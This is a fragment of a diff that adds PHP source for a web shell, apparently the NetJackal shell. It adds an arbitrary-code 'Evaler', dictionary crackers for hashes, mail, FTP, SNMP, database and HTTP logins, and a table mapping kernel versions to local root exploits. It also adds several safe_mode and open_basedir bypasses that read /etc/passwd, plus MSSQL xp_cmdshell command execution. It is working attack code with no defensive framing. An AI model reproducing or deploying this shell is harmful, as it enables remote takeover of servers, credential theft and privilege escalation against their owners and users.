!document.form.logfilE.disabled;' style='border-width:1px;background-color:#666666;' checked>Log</td><td bgcolor='#666666'><input type=text name=logfilE size=25 value='".whereistmP().DIRECTORY_SEPARATOR.".log'> <input class=buttons type=submit name=start value=Start></form>$et</center>";
+}
+function hashcrackeR(){
+global $errorbox,$t,$et,$hcwd;
+if(!empty($_REQUEST['hash']) && !empty($_REQUEST['dictionary']) && !empty($_REQUEST['type'])){
+if(isset($_REQUEST['loG'])&& !empty($_REQUEST['logfilE'])){$log=1;$file=$_REQUEST['logfilE'];}else $log=0;
+$dictionary=fopen($_REQUEST['dictionary'],'r');
+if($dictionary){
+$hash=strtoupper($_REQUEST['hash']);
+echo '<font color=blue>Cracking '.htmlspecialchars($hash).'...<br>';
+$type=($_REQUEST['type']=='MD5')?'md5':'sha1';
+while(!feof($dictionary)){
+$word=trim(fgets($dictionary)," \n\r");
+if($hash==strtoupper(($type($word)))){echo "The answer is $word<br>";if($log)file_add_contentS($file,"$x\r\n");break;}
+}
+echo 'Done!</font>';
+fclose($dictionary);
+}
+else{
+echo "$errorbox Can not open dictionary.$et";
+}
+}
+echo "<center>${t}Hash cracker:</td><td bgcolor='#333333'></td></tr><form method='POST'><tr><td width='20%' bgcolor='#666666'>Dictionary:</td><td bgcolor='#666666'><input type=text name=dictionary size=35></td></tr><tr><td width='20%' bgcolor='#808080'>Hash:</td><td bgcolor='#808080'><input type=text name=hash size=35></td></tr><tr><td width='20%' bgcolor='#666666'>Type:</td><td bgcolor='#666666'><select name=type><option selected value=MD5>MD5</option><option value=SHA1>SHA1</option></select></td></tr><tr><td width='20%' bgcolor='#808080'><input type=checkbox name=loG value=1 onClick='document.form.logfilE.disabled = !document.form.logfilE.disabled;' style='border-width:1px;background-color:#808080;' checked>Log</td><td bgcolor='#808080'><input type=text name=logfilE size=25 value='".whereistmP().DIRECTORY_SEPARATOR.".log'> $hcwd <input class=buttons type=submit value=Start></form>$et</center>";
+}
+function pr0xy(){
+global $errorbox,$et,$footer,$hcwd;
+echo "<table border=0 cellpadding=0 cellspacing=0 style='border-collapse: collapse' bgcolor='#333333' width='100%'><form method='POST'><tr><td width='20%'><b>Navigator: </b><input type=text name=urL size=140 value='";if(!!empty($_REQUEST['urL'])) echo 'http://www.edpsciences.org/htbin/ipaddress'; else echo htmlspecialchars($_REQUEST['urL']);echo "'>$hcwd<input type=submit class=buttons value=Go></form>$et";
+if(!empty($_REQUEST['urL'])){
+$u=parse_url($_REQUEST['urL']);
+$host=$u['host'];$file=(!empty($u['path']))?$u['path']:'/';
+$dir=dirname($file);
+$con=getiT($_REQUEST['urL']);
+$s=array("href=mailto"=>"HrEf=mailto","HREF=mailto"=>"HrEf=mailto","href='mailto"=>"HrEf=\"mailto","HREF=\"mailto"=>"HrEf=\"mailto","href=\'mailto"=>"HrEf=\"mailto","HREF=\'mailto"=>"HrEf=\"mailto","href=\"http"=>"HrEf=\"".hlinK("seC=px&urL=http"),"href=\'http"=>"HrEf=\"".hlinK("seC=px&urL=http"),"HREF=\'http"=>"HrEf=\"".hlinK("seC=px&urL=http"),"href=http"=>"HrEf=".hlinK("seC=px&urL=http"),"HREF=http"=>"HrEf=".hlinK("seC=px&urL=http"),"href=\""=>"HrEf=\"".hlinK("seC=px&urL=http://$host/$dir/"),"HREF=\""=>"HrEf=\"".hlinK("seC=px&urL=http://$host/$dir/"),"href=\""=>"HrEf=\'".hlinK("seC=px&urL=http://$host/$dir/"),'HREF="'=>'HrEf="'.hlinK("seC=px&urL=http://$host/$dir/"),"href="=>"HrEf=".hlinK("seC=px&urL=http://$host/$dir/"),"HREF="=>"HrEf=".hlinK("seC=px&urL=http://$host/$dir/"));
+$con=replace_stR($s,$con);
+echo $con;
+}
+}
+function sqlclienT(){
+global $t,$errorbox,$et,$hcwd;
+if(!empty($_REQUEST['serveR']) && !empty($_REQUEST['useR']) && isset($_REQUEST['pasS']) && !empty($_REQUEST['querY'])){
+$server=$_REQUEST['serveR'];$type=$_REQUEST['typE'];$pass=$_REQUEST['pasS'];$user=$_REQUEST['useR'];$query=$_REQUEST['querY'];
+$db=(empty($_REQUEST['dB']))?'':$_REQUEST['dB'];
+$res=querY($type,$server,$user,$pass,$db,$query);
+if($res){
+$res=str_replace('|-|-|-|-|-|','</td><td>',$res);
+$res=str_replace('|+|+|+|+|+|','</td></tr><tr><td>',$res);
+$r=explode('[+][+][+]',$res);
+$r[1]=str_replace('[-][-][-]',"</td><td bgcolor='333333'>",$r[1]);
+echo "<table border=0 bgcolor='666666' width='100%'></tr><tr><td bgcolor='333333'>".$r[1].'</tr><tr><td>'.$r[0]."$et<br>";
+}
+else{
+echo "$errorbox Failed!$et<br>";
+}
+}
+if(empty($_REQUEST['typE']))$_REQUEST['typE']='';
+echo "<center>${t}SQL cilent:</td><form name=client method='POST'><td bgcolor='#333333'><select name=typE><option valut=MySQL  onClick='document.client.serveR.disabled = false;' ";if ($_REQUEST['typE']=='MySQL')echo 'selected';echo ">MySQL</option><option valut=MSSQL onClick='document.client.serveR.disabled = false;' ";if ($_REQUEST['typE']=='MSSQL')echo 'selected';echo ">MSSQL</option><option valut=Oracle onClick='document.client.serveR.disabled = true;' ";if ($_REQUEST['typE']=='Oracle')echo 'selected';echo ">Oracle</option><option valut=PostgreSQL onClick='document.client.serveR.disabled = false;' ";if ($_REQUEST['typE']=='PostgreSQL')echo 'selected';echo ">PostgreSQL</option></select></td></tr><tr><td width='20%' bgcolor='#666666'>Server:</td><td bgcolor='#666666'><input type=text value='";if (!empty($_REQUEST['serveR'])) echo htmlspecialchars($_REQUEST['serveR']);else echo 'localhost'; echo "' name=serveR size=35></td></tr><tr><td width='20%' bgcolor='#808080'>Username:</td><td bgcolor='#808080'><input type=text name=useR value='";if (!empty($_REQUEST['useR'])) echo htmlspecialchars($_REQUEST['useR']);else echo 'root'; echo "' size=35></td><tr><td width='20%' bgcolor='#666666'>Password:</td><td bgcolor='#666666'><input type=text value='";if (isset($_REQUEST['pasS'])) echo htmlspecialchars($_REQUEST['pasS']);else echo '123456'; echo "' name=pasS size=35></td></tr><tr><td width='20%' bgcolor='#808080'>Database:</td><td bgcolor='#808080'><input type=text value='";if (!empty($_REQUEST['dB'])) echo htmlspecialchars($_REQUEST['dB']); echo "' name=dB size=35></td><tr><td width='20%' bgcolor='#666666'>Query:</td><td bgcolor='#666666'><textarea name=querY rows=5 cols=27>";if (!empty($_REQUEST['querY'])) echo htmlspecialchars(($_REQUEST['querY']));else echo 'SHOW DATABASES'; echo "</textarea></td></tr></tr><tr><td width='20%' bgcolor='#808080'></td><td bgcolor='#808080' align=right>$hcwd<input class=buttons type=submit value='Submit Query'></form>$et</center>";
+}
+function querY($type,$host,$user,$pass,$db='',$query){
+$res='';
+switch($type){
+case 'MySQL':
+if(!function_exists('mysql_connect'))return 0;
+$link=mysql_connect($host,$user,$pass);
+if($link){
+if(!empty($db))mysql_select_db($db,$link);
+$result=mysql_query($query,$link);
+while($data=mysql_fetch_row($result))$res.=implode('|-|-|-|-|-|',$data).'|+|+|+|+|+|';
+$res.='[+][+][+]';
+for($i=0;$i<mysql_num_fields($result);$i++)
+$res.=mysql_field_name($result,$i).'[-][-][-]';
+mysql_close($link);
+return $res;
+}
+break;
+case 'MSSQL':
+if(!function_exists('mssql_connect'))return 0;
+$link=mssql_connect($host,$user,$pass);
+if($link){
+if(!empty($db))mssql_select_db($db,$link);
+$result=mssql_query($query,$link);
+while($data=mssql_fetch_row($result))$res.=implode('|-|-|-|-|-|',$data).'|+|+|+|+|+|';
+$res.='[+][+][+]';
+for($i=0;$i<mssql_num_fields($result);$i++)
+$res.=mssql_field_name($result,$i).'[-][-][-]';
+mssql_close($link);
+return $res;
+}
+break;
+case 'Oracle':
+if(!function_exists('ocilogon'))return 0;
+$link=ocilogon($user,$pass,$db);
+if($link){
+$stm=ociparse($link,$query);
+ociexecute($stm,OCI_DEFAULT);
+while($data=ocifetchinto($stm,$data,OCI_ASSOC+OCI_RETURN_NULLS))$res.=implode('|-|-|-|-|-|',$data).'|+|+|+|+|+|';
+$res.='[+][+][+]';
+for($i=0;$i<oci_num_fields($stm);$i++)
+$res.=oci_field_name($stm,$i).'[-][-][-]';
+return $res;
+}
+break;
+case 'PostgreSQL':
+if(!function_exists('pg_connect'))return 0;
+$link=pg_connect("host=$host dbname=$db user=$user password=$pass");
+if($link){
+$result=pg_query($link,$query);
+while($data=pg_fetch_row($result))$res.=implode('|-|-|-|-|-|',$data).'|+|+|+|+|+|';
+$res.='[+][+][+]';
+for($i=0;$i<pg_num_fields($result);$i++)
+$res.=pg_field_name($result,$i).'[-][-][-]';
+pg_close($link);
+return $res;
+}
+break;
+}
+return 0;
+}
+function phpevaL(){
+global $t,$hcwd,$et;
+echo '<center>';
+if(!empty($_REQUEST['code'])){
+$s=array('<?php'=>'','<?'=>'','?>'=>'');
+echo "<textarea rows='10' cols='64'>";echo htmlspecialchars(eval(replace_stR($s,$_REQUEST['code'])));echo '</textarea><br><br>';
+}
+echo "${t}Evaler:</td><td bgcolor='#333333'></td></tr><form method='POST'><tr><td width='20%' bgcolor='#666666'>Codes:</td><td bgcolor='#666666'><textarea rows='10' name='code' cols='64'>";if(!empty($_REQUEST['code']))echo htmlspecialchars($_REQUEST['code']);echo "</textarea></td></tr><tr><td width='20%' bgcolor='#666666'></td><td bgcolor='#666666' align=right>$hcwd<input class=buttons type=submit value=Execute></form>$et</center>";
+}
+function rootxpL(){
+$v=php_uname();
+$db=array('2.6.17'=>'prctl3, raptor_prctl, py2','2.6.16'=>'raptor_prctl, exp.sh, raptor, raptor2, h00lyshit','2.6.15'=>'py2, exp.sh, raptor, raptor2, h00lyshit','2.6.14'=>'raptor, raptor2, h00lyshit','2.6.13'=>'kdump, local26, py2, raptor_prctl, exp.sh, prctl3, h00lyshit','2.6.12'=>'h00lyshit','2.6.11'=>'krad3, krad, h00lyshit','2.6.10'=>'h00lyshit, stackgrow2, uselib24, exp.sh, krad, krad2','2.6.9'=>'exp.sh, krad3, py2, prctl3, h00lyshit','2.6.8'=>'h00lyshit, krad, krad2','2.6.7'=>'h00lyshit, krad, krad2','2.6.6'=>'h00lyshit, krad, krad2','2.6.2'=>'h00lyshit, krad, mremap_pte','2.6.'=>'prctl, kmdx, newsmp, pwned, ptrace_kmod, ong_bak','2.4.29'=>'elflbl, expand_stack, stackgrow2, uselib24, smpracer','2.4.27'=>'elfdump, uselib24','2.4.25'=>'uselib24','2.4.24'=>'mremap_pte, loko, uselib24','2.4.23'=>'mremap_pte, loko, uselib24','2.4.22'=>'loginx, brk, km2, loko, ptrace, uselib24, brk2, ptrace-kmod','2.4.21'=>'w00t, brk, uselib24, loginx, brk2, ptrace-kmod','2.4.20'=>'mremap_pte, w00t, brk, ave, uselib24, loginx, ptrace-kmod, ptrace, kmod','2.4.19'=>'newlocal, w00t, ave, uselib24, loginx, kmod','2.4.18'=>'km2, w00t, uselib24, loginx, kmod','2.4.17'=>'newlocal, w00t, uselib24, loginx, kmod','2.4.16'=>'w00t, uselib24, loginx','2.4.10'=>'w00t, brk, uselib24, loginx','2.4.9'=>'ptrace24, uselib24','2.4.'=>'kmdx, remap, pwned, ptrace_kmod, ong_bak','2.2.25'=>'mremap_pte','2.2.24'=>'ptrace','2.2.'=>'rip');
+foreach($db as $k=>$x)if(strstr($v,$k))return $x;
+return 0;
+}
+function toolS(){
+global $t,$hcwd,$et,$cwd;
+if(!empty($_REQUEST['serveR']) && !empty($_REQUEST['domaiN'])){
+$ser=fsockopen($_REQUEST['serveR'],43,$en,$es,5);
+fputs($ser,$_REQUEST['domaiN']."\r\n");
+echo '<pre>';
+while(!feof($ser))echo fgets($ser,1024);
+echo '</pre>';
+fclose($ser);
+}
+elseif(!empty($_REQUEST['urL'])){
+$h='';
+$u=parse_url($_REQUEST['urL']);
+$host=$u['host'];$file=(!empty($u['path']))?$u['path']:'/';$port=(empty($u['port']))?80:$u['port'];
+$ser=fsockopen($host,$port,$en,$es,5);
+if($ser){
+fputs($ser,"GET $file\r\nHost: $host\r\n\r\n");
+echo '<pre>';
+while($h!="\r\n"){$h=fgets($ser,1024);echo $h;}
+echo '</pre>';
+fclose($ser);
+}
+}
+elseif(!empty($_REQUEST['ouT']) && isset($_REQUEST['pW'])&& !empty($_REQUEST['uN'])){
+$htpasswd=$_REQUEST['ouT'].DIRECTORY_SEPARATOR.'.htpasswd';
+$htaccess=$_REQUEST['ouT'].DIRECTORY_SEPARATOR.'.htaccess';
+file_put_contents($htpasswd,$_REQUEST['uN'].':'.crypt(trim($_REQUEST['pW']),CRYPT_STD_DES));
+file_put_contents($htaccess,"AuthName \"Secure\"\r\nAuthType Basic\r\nAuthUserFile $htpasswd\r\nRequire valid-user\r\n");
+echo '<font color=blue>Done</font>';
+}
+$s="</td><td bgcolor='#333333'></td></tr><form method='POST'><tr><td width='20%' bgcolor='#666666'>";
+echo "<center>${t}WhoIs:${s}Server:</td><td bgcolor='#666666'><input type=text value='";if (!empty($_REQUEST['serveR'])) echo htmlspecialchars($_REQUEST['serveR']);else echo 'whois.geektools.com'; echo "' name=serveR size=35></td></tr><tr><td width='20%' bgcolor='#808080'>domain:</td><td bgcolor='#808080'><input type=text name=domaiN value='";if (!empty($_REQUEST['domaiN'])) echo htmlspecialchars($_REQUEST['domaiN']); else echo 'google.com'; echo  "' size=35></td><tr><td bgcolor='#666666'></td><td bgcolor='#666666' align=right>$hcwd<input class=buttons type=submit value='Do'></form>$et<br>${t}.ht* generator:${s}Username:</td><td bgcolor='#666666'><input type=text value='";if (!empty($_REQUEST['uN'])) echo htmlspecialchars($_REQUEST['uN']);else echo 'r00t'; echo "' name=uN size=35></td></tr><tr><td width='20%' bgcolor='#808080'>Password:</td><td bgcolor='#808080'><input type=text name=pW value='";if (!empty($_REQUEST['pW'])) echo htmlspecialchars($_REQUEST['pW']); else echo uniqid('@'); echo "' size=35></td><tr><td width='20%' bgcolor='#666666'>Directory:</td><td bgcolor='#666666'><input type=text name=ouT value='";if (!empty($_REQUEST['ouT'])) echo htmlspecialchars($_REQUEST['ouT']); else echo $cwd; echo "' size=35></td><tr><td bgcolor='#808080'></td><td bgcolor='#808080' align=right>$hcwd<input class=buttons type=submit value=Make></form>$et<br>${t}Grab header:${s}URL:</td><td bgcolor='#666666'><input type=text value='";if (!empty($_REQUEST['urL']))echo htmlspecialchars($_REQUEST['urL']);else echo 'http://netjackal.by.ru/index.htm'; echo "' name=urL size=35></td></tr><tr><td bgcolor='#808080'></td><td bgcolor='#808080' align=right>$hcwd<input class=buttons type=submit value='Get'></form>$et<br></center>";
+}
+function hexvieW(){
+if(!empty($_REQUEST['filE'])){
+$f=$_REQUEST['filE'];
+echo "<table border=0 style='border-collapse: collapse' width='100%'><td width='10%' bgcolor='#282828'>Offset</td><td width='25%' bgcolor='#282828'>Hex</td><td width='25%' bgcolor='#282828'></td><td width='40%' bgcolor='#282828'>ASCII</td></tr>";
+$file=fopen($f,'r');
+$i=-1;
+while(!feof($file)){
+$ln='';
+$i++;
+echo "<tr><td width='10%' bgcolor='#";
+if($i % 2==0)echo '666666';else echo '808080';
+echo "'>";echo str_repeat('0',(8-strlen($i*16))).$i*16;echo '</td>';
+echo "<td width='25%' bgcolor='#";
+if($i % 2==0)echo '666666';else echo '808080'; 
+echo "'>";
+for($j=0;$j<=7;$j++){
+if(!feof($file)){
+$tmp=strtoupper(dechex(ord(fgetc($file))));
+if(strlen($tmp)==1)$tmp='0'.$tmp;
+echo $tmp.' ';
+$ln.=$tmp;
+}
+}
+echo "</td><td width='25%' bgcolor='#";
+if($i % 2==0)echo '666666';else echo '808080';
+echo "'>";
+for($j=7;$j<=14;$j++){
+if(!feof($file)){
+$tmp=strtoupper(dechex(ord(fgetc($file))));
+if(strlen($tmp)==1)$tmp='0'.$tmp;
+echo $tmp.' ';
+$ln.=$tmp;
+}
+}
+echo "</td><td width='40%' bgcolor='#";
+if($i % 2==0)echo '666666';else echo '808080';
+echo "'>";
+$n=0;$asc='';$co=0;
+for($k=0;$k<=16;$k++){
+$co=hexdec(substr($ln,$n,2));
+if(($co<=31)||(($co>=127)&&($co<=160)))$co=46;
+$asc.=chr($co);
+$n+=2;
+}
+echo htmlspecialchars($asc);
+echo '</td></tr>';
+}
+}
+fclose($file);
+echo '</table>';
+}
+function safemodE(){
+global $windows,$t,$hcwd,$et;
+$file=(empty($_REQUEST['file']))?'/etc/passwd':$_REQUEST['file'];
+$pr="\r\n</font><font color=green>Method ";
+$po=")</font><font color=blue>\r\n";
+$i=1;
+if(!empty($_REQUEST['read'])){
+echo "<pre>$pr$i:(ini_restore$po";
+ini_restore('safe_mode');ini_restore('open_basedir');
+readfile($file);
+$i++;
+echo "$pr$i:(include$po";
+include($file);
+$i++;
+echo "$pr$i:(copy$po";
+$tmp=tempnam('','cx');
+copy('compress.zlib://'.$file,$tmp);
+$fh=fopen($tmp,'r');
+$data=fread($fh,filesize($tmp));
+fclose($fh);
+echo $data;
+$i++;
+if(function_exists('mb_send_mail')){
+echo "$pr$i:(mb_send_mail$po";
+if(file_exists('/tmp/mb_send_mail'))unlink('/tmp/mb_send_mail');
+mb_send_mail(NULL, NULL, NULL, NULL,'-C $file -X /tmp/mb_send_mail');
+readfile('/tmp/mb_send_mail');
+$i++;
+}
+if(function_exists('curl_init')){
+echo "$pr$i:(curl_init [A]$po";
+$fh=curl_init('file://'.$file.'');
+$tmp=curl_exec($fh);
+echo $tmp;
+$i++;
+echo "$pr$i:(curl_init [B]$po";
+$i++;
+if(strstr($file,DIRECTORY_SEPARATOR))$ch=curl_init('file:///'.$file."\x00/../../../../../../../../../../../../".__FILE__);
+else $ch=curl_init('file://'.$file."\x00".__FILE__);
+var_dump(curl_exec($ch));
+}
+if(is_writable('.')){
+echo "$pr$i:(php.ini$po";
+file_put_contents('php.ini','safe_mode = Off');
+readfile($file);
+unlink('php.ini');
+$i++;
+}
+if(is_object($ws=new COM('WScript.Shell'))){
+echo "$pr$i:(COM$po";
+echo $exec=comshelL("type \"$file\"",$ws);
+$i++;
+}
+if(checkfunctioN('win_shell_execute')){
+echo "$pr$i:(win32std$po";
+echo winshelL("type \"$file\"");
+$i++;
+}
+if(checkfunctioN('win32_create_service')){
+echo "$pr$i:(win32service$po";
+echo srvshelL("type \"$file\"");
+$i++;
+}
+if(function_exists('imap_open')){
+echo "$pr$i:(imap [A]$po";
+$str=imap_open('/etc/passwd','','');
+$list=imap_list($str,$file,'*');
+for($i=0;$i<count($list);$i++)echo $list[$i]."\n";
+imap_close($str);
+$i++;
+echo "$pr$i:(imap [B]$po";
+$str=imap_open($file,'','');
+$tmp=imap_body($str,1);
+echo $tmp;
+imap_close($str);
+$i++;
+}
+if($file=='/etc/passwd'){
+echo "$pr$i:(posix$po";
+for($uid=0;$uid<99999;$uid++){
+$h=posix_getpwuid($uid);
+if(!empty($h))foreach($h as $v)echo "$v:";
+echo "\r\n";
+}
+}
+echo "\n</pre></font>";
+}
+elseif(!empty($_REQUEST['show'])){
+echo "<pre>$pr$i:(glob$po";
+$con=glob("$file*");
+foreach ($con as $v){
+   echo "$v\n";
+}
+$i++;
+if(function_exists('imap_open')){
+echo "$pr$i:(imap$po";
+$str=imap_open('/etc/passwd','','');
+$s=explode("|",$file);
+if(count($s)>1)$list=imap_list($str,trim($s[0]),trim($s[1]));else $list=imap_list($str,trim($str[0]),'*');
+for($i=0;$i<count($list);$i++)echo "$list[$i]\r\n";
+imap_close($str);
+$i++;
+}
+if(is_object($ws=new COM('WScript.Shell'))){
+echo "$pr$i:(COM$po";
+$exec=comshelL("dir \"$file\"",$ws);
+$exec=str_replace("\t",'',$exec);
+echo $exec;
+$i++;
+}
+if(checkfunctioN('win_shell_execute')){
+echo "$pr$i:(win32std$po";
+echo winshelL("dir \"$file\"");
+$i++;
+}
+if(checkfunctioN('win32_create_service')){
+echo "$pr$i:(win32service$po";
+echo srvshelL("dir \"$file\"");
+$i++;
+}
+echo "\n</pre></font>";
+}
+elseif(!empty($_REQUEST['sql'])){
+$ta=uniqid('N');
+$s=array("CREATE TEMPORARY TABLE $ta (file LONGBLOB)","LOAD DATA INFILE '".addslashes($_REQUEST['file'])."' INTO TABLE $ta","SELECT * FROM $ta");
+$l=mysql_connect('localhost', $_REQUEST['user'], $_REQUEST['pass']);
+mysql_select_db($_REQUEST['db'],$l);
+echo '<pre><font color=blue>';
+foreach($s as $v){
+$q = mysql_query($v,$l);
+while($d=mysql_fetch_row($q))echo htmlspecialchars($d[0]);
+}
+echo '</pre></font>';
+}
+elseif(!empty($_REQUEST['serveR']) && !empty($_REQUEST['coM']) && !empty($_REQUEST['dB']) && !empty($_REQUEST['useR']) && isset($_REQUEST['pasS'])){
+$res='';
+$tb=uniqid('NJ');
+$db=mssql_connect($_REQUEST['serveR'],$_REQUEST['useR'],$_REQUEST['pasS']);
+mssql_select_db($_REQUEST['dB'],$db);
+mssql_query("create table $tb ( string VARCHAR (500) NULL)",$db);
+mssql_query("insert into $tb EXEC master.dbo.xp_cmdshell '".$_REQUEST['coM']."'",$db);
+$re=mssql_query("select * from $tb",$db);
+while(($row=mssql_fetch_row($re)))
+{
+$res.= $row[0]."\r\n";
+}
+mssql_query("drop table $tb",$db);
+mssql_close($db);
+echo "<center><textarea rows='18' cols='64'>$res</textarea></center><br>";
+}
+$f=(!empty($_REQUEST['file']))?htmlspecialchars($_REQUEST['file']):'/etc/passwd';
+$u=(!empty($_REQUEST['user']))?htmlspecialchars($_REQUEST['user']):'root';
+$p=(!empty($_REQUEST['pass']))?htmlspecialchars($_REQUEST['pass']):'123456';
+$d=(!empty($_REQUEST['db']))?htmlspecialchars($_REQUEST['db']):'test';
+echo "<center>${t}Use PHP Bugs:</td><td bgcolor='#333333'></td></tr><form method='POST'><tr><td width='20%' bgcolor='#666666'>File:</td><td bgcolor='#666666'><input type=text value='$f' name=file size=35></td></tr><tr><td bgcolor='#808080'></td><td bgcolor='#808080' align=right>$hcwd<input class=buttons type=submit name=read value='Read File'><input class=buttons type=submit name=show value='Show directory'></form>$et<br>${t}Use MySQL:</td><td bgcolor='#333333'></td></tr><form method='POST'><tr><td width='20%' bgcolor='#666666'>File:</td><td bgcolor='#666666'><input type=text value='$f' name=file size=35></td></tr><tr><td width='20%' bgcolor='#808080'>Username:</td><td bgcolor='#808080'><input type=text name=user value='$u'></td></tr><tr><td width='20%' bgcolor='#666666'>Password:</td><td bgcolor='#666666'><input type=text name=pass value='$p'></td></tr><tr><td width='20%' bgcolor='#808080'>Database:</td><td bgcolor='#808080'><input type=text name=db value='$d'></td></tr><tr><td bgcolor='#666666'></td><td bgcolor='#666666' align=right>$hcwd<input class=buttons type=submit name=sql value='Read'></form>$et<br>${t}MSSQL Exec:</td><td bgcolor='#333333'></td></tr><form method='POST'><tr><td width='20%' bgcolor='#666666'>Server:</td><td bgcolor='#666666'><input type=text value='";if (!empty($_REQUEST['serveR'])) echo htmlspecialchars($_REQUEST['serveR']);else echo 'localhost'; echo "' name=serveR size=35></td></tr><tr><td width='20%' bgcolor='#808080'>Username:</td><td bgcolor='#808080'><input type=text name=useR value='";if (!empty($_REQUEST['useR'])) echo htmlspecialchars($_REQUEST['useR']); else echo 'sa'; echo "' size=35></td></tr><tr><td width='20%' bgcolor='#666666'>Password:</td><td bgcolor='#666666'><input type=text name=pasS value='";if (!empty($_REQUEST['pasS'])) echo htmlspecialchars($_REQUEST['pasS']);echo "' size=35></td></tr><td width='20%' bgcolor='#808080'>Command:</td><td bgcolor='#808080'><input type=text name=coM value='";if (!empty($_REQUEST['coM'])) echo htmlspecialchars($_REQUEST['coM']);else echo 'dir c:';echo "' size=35></td></tr><tr><td bgcolor='#666666'>Database:</td><td bgcolor='#666666'><input type=text name=dB value='";if(isset($_REQUEST['dB'])) echo htmlspecialchars($_REQUEST['dB']);else echo 'master';echo "'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$hcwd<input class=buttons type=submit value='Execute'></form>$et</center>";
+}
+function crackeR(){
+global $t,$et,$crack,$cwd;
+$check=(!empty($_REQUEST['dictionary']) && !empty($_REQUEST['target']))?1:0;
+if(!empty($_REQUEST['cracK']) && !$check){
+$c=htmlspecialchars($_REQUEST['cracK']);
+echo "<center>$t$c cracker:$crack";
+}
+elseif(!empty($_REQUEST['cracK']) && $check){
+$pro=strtolower($_REQUEST['cracK']).'checK';
+$target=$_REQUEST['target'];
+$type=$_REQUEST['combo'];
+$user=(!empty($_REQUEST['user']))?$_REQUEST['user']:'';
+$dictionary=fopen($_REQUEST['dictionary'],'r');
+if(isset($_REQUEST['loG'])&& !empty($_REQUEST['logfilE'])){$log=1;$file=$_REQUEST['logfilE'];}else $log=0;
+if($dictionary){
+echo '<font color=blue>Cracking '.htmlspecialchars($target).'...<br>';
+while(!feof($dictionary)){
+if($type){
+$combo=trim(fgets($dictionary)," \n\r");
+$user=substr($combo,0,strpos($combo,':'));
+$pass=substr($combo,strpos($combo,':')+1);
+}else{
+$pass=trim(fgets($dictionary)," \n\r");
+}
+$ret=$pro($target,$user,$pass,5);
+if($ret==-1){echo "$errorbox Can not connect to server.$et";break;}else{
+if($ret){$x="U: $user P: $pass";echo "$x<br>";if($log)file_add_contentS($file,"$x\r\n");if(!$type)break;}}
+}
+echo '<br>Done</font>';
+fclose($dictionary);
+}
+else{
+echo "$errorbox Can not open dictionary.$et";
+}
+}
+else{
+echo "<center><table border=0 bgcolor=#333333><tr><td><a href='".hlinK("seC=hc&workingdiR=$cwd")."'>[Hash]</a> - <a href='".hlinK("seC=cr&cracK=SMTP&workingdiR=$cwd")."'>[SMTP]</a> - <a href='".hlinK("seC=cr&cracK=POP3&workingdiR=$cwd")."'>[POP3]</a> - <a href='".hlinK("seC=cr&cracK=IMAP&workingdiR=$cwd")."'>[IMAP]</a> - <a href='".hlinK("seC=cr&cracK=FTP&workingdiR=$cwd")."'>[FTP]</a> - <a href='".hlinK("seC=snmp&workingdiR=$cwd")."'>[SNMP]</a> - <a href='".hlinK("seC=cr&cracK=MySQL&workingdiR=$cwd")."'>[MySQL]</a> - <a href='".hlinK("seC=cr&cracK=MSSQL&workingdiR=$cwd")."'>[MSSQL]</a> - <a href='".hlinK("seC=fcr&workingdiR=$cwd")."'>[HTTP Form]</a> - <a href='".hlinK("seC=auth&workingdiR=$cwd")."'>[HTTP Auth(basic)]</a> - <a href='".hlinK("seC=dic&workingdiR=$cwd")."'>[Dictionary maker]</a>$et</center>";
+}
+}
+function snmpcrackeR(){
+global $t,$et,$errorbox,$hcwd;
+if(!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){
+$target=$_REQUEST['target'];
+if(isset($_REQUEST['loG'])&& !empty($_REQUEST['logfilE'])){$log=1;$file=$_REQUEST['logfilE'];}else $log=0;
+$dictionary=fopen($_REQUEST['dictionary'],'r');
+if($dictionary){
+echo '<font color=blue>Cracking '.htmlspecialchars($target).'...<br>';
+while(!feof($dictionary)){
+$com=trim(fgets($dictionary)," \n\r");
+$res=snmpchecK($target,$com,2);
+if($res){echo "$com<br>";if($log)file_add_contentS($file,"$com\r\n");}
+}
+echo '<br>Done</font>';
+fclose($dictionary);
+}
+else{
+echo "$errorbox Can not open dictionary.$et";
+}
+}else echo "<center>${t}SNMP cracker:</td><td bgcolor='#333333'></td></tr><form method='POST'>$hcwd<tr><td width='20%' bgcolor='#666666'>Dictionary:</td><td bgcolor='#666666'><input type=text name=dictionary size=35></td></tr><tr><td width='20%' bgcolor='#808080'>Server:</td><td bgcolor='#808080'><input type=text name=target size=35></td></tr><tr><td width='20%' bgcolor='#666666'><input type=checkbox name=loG value=1 onClick='document.form.logfilE.disabled = !document.form.logfilE.disabled;' style='border-width:1px;background-color:#666666;' checked>Log</td><td bgcolor='#666666'><input type=text name=logfilE size=25 value='".whereistmP().DIRECTORY_SEPARATOR.".log'> <input class=buttons type=submit value=Start></form>$et</center>";
+}
+function dicmakeR(){
+global $errorbox,$windows,$footer,$t,$et,$hcwd;
+$combo=(empty($_REQUEST['combo']))?0:1;
+if(!empty($_REQUEST['range'])&& !empty($_REQUEST['output']) && !empty($_REQUEST['min']) && !empty($_REQUEST['max'])){
+$min=$_REQUEST['min'];
+$max=$_REQUEST['max'];
+if($max<$min)die($errorbox."Bad input!$et".$footer);
+$s=$w='';
+$out=$_REQUEST['output'];
+$r=$_REQUEST['range'];
+$dic=fopen($out,'w');
+if($r==1){
+for($s=pow(10,$min-1);$s<pow(10,$max-1);$s++){
+$w=$s;
+if($combo)$w="$w:$w";
+fwrite($dic,$w."\n");
+}
+}
+else{
+$s=str_repeat($r,$min);
+while(strlen($s)<$max){
+$w=$s;
+if($combo)$w="$w:$w";
+fwrite($dic,$w."\n");
+$s++;
+}
+}
+fclose($dic);
+echo '<font color=blue>Done</font>';
+}
+elseif(!empty($_REQUEST['input']) && !empty($_REQUEST['output'])){
+$input=fopen($_REQUEST['input'],'r');
+if(!$input){
+if($windows)echo $errorbox.'Unable to read from '.htmlspecialchars($_REQUEST['input'])."$et<br>";
+else{
+$input=explode("\n",shelL("cat $input"));
+$output=fopen($_REQUEST['output'],'w');
+if($output){
+foreach($input as $in){
+$user=$in;
+$user=trim(fgets($in)," \n\r");
+if(!strstr($user,':'))continue;
+$user=substr($user,0,(strpos($user,':')));
+if($combo)fwrite($output,$user.':'.$user."\n");else fwrite($output,$user."\n");
+}
+fclose($input);fclose($output);
+echo '<font color=blue>Done</font>';
+}
+}
+}
+else{
+$output=fopen($_REQUEST['output'],'w');
+if($output){
+while(!feof($input)){
+$user=trim(fgets($input)," \n\r");
+if(!strstr($user,':'))continue;
+$user=substr($user,0,(strpos($user,':')));
